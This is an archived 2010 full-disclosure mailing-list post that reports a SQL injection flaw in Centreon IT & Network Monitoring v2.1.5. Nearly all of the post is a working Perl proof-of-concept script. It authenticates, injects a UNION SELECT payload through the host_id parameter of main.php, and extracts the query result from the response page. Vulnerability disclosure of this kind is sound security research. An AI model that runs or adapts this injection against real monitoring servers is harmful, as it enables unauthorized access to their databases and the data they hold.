lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1270201261.7883.3.camel@localhost>
Date: Fri, 02 Apr 2010 11:41:01 +0200
From: Mehdi Mahdjoub - Sysdream IT Security Services <m.mahdjoub@...dream.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Vulnerability Centreon IT & Network Monitoring
	v2.1.5

#!/usr/bin/perl
# //--------[PoC]---------//
#
# Title   : Centreon IT & Network Monitoring v2.1.5 - Injection SQL
# Version : 2.1.5
# Author  : Jonathan Salwan (j.salwan@...dream.com)
#
#
# [Vuln sql injection]
# http://localhost/centreon/main.php?p=201&host_id=-1%20[SQL
Injection]&o=p&min=1
# 
# http://localhost/centreon/main.php?p=201&host_id=-1 UNION SELECT
1,@@version,3,4,5&o=p&min=1
#
#
# //-------[Credit]-------//
#
# http://www.sysdream.com/article.php?story_id=328&section_id=78
# http://www.shell-storm.org
#

use LWP::UserAgent;

my $url   = 'http://localhost/centreon/index.php';
my $login = 'login';
my $paswd = 'pwd';
my $sql   = 'http://localhost/centreon/main.php?p=201&host_id=-1 UNION
SELECT 1,@@version,3,4,5&o=p&min=1';

my $ua = LWP::UserAgent->new;
my $response = $ua->get($url);
my $cook = $response->header('Set-Cookie');

my $req2 = $ua->post($url, 
                    {useralias => $login, password => $paswd, submit =>
'login'},
                    Cookie => $cook,
                    Content-Type => 'application/x-www-form-urlencoded'
                    );

my $response = $ua->get($sql, Cookie => $cook);
my $content = $response->content();

        open(FILE, '>sql-centreon.txt');
        print FILE $content;
        close(FILE);

        print "\n[Answer SQL Injection]\n\n";

        my $selection = system('cat sql-centreon.txt | grep
">Host</td>"');
        unlink('sql-centreon.txt');     

print "\n";


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ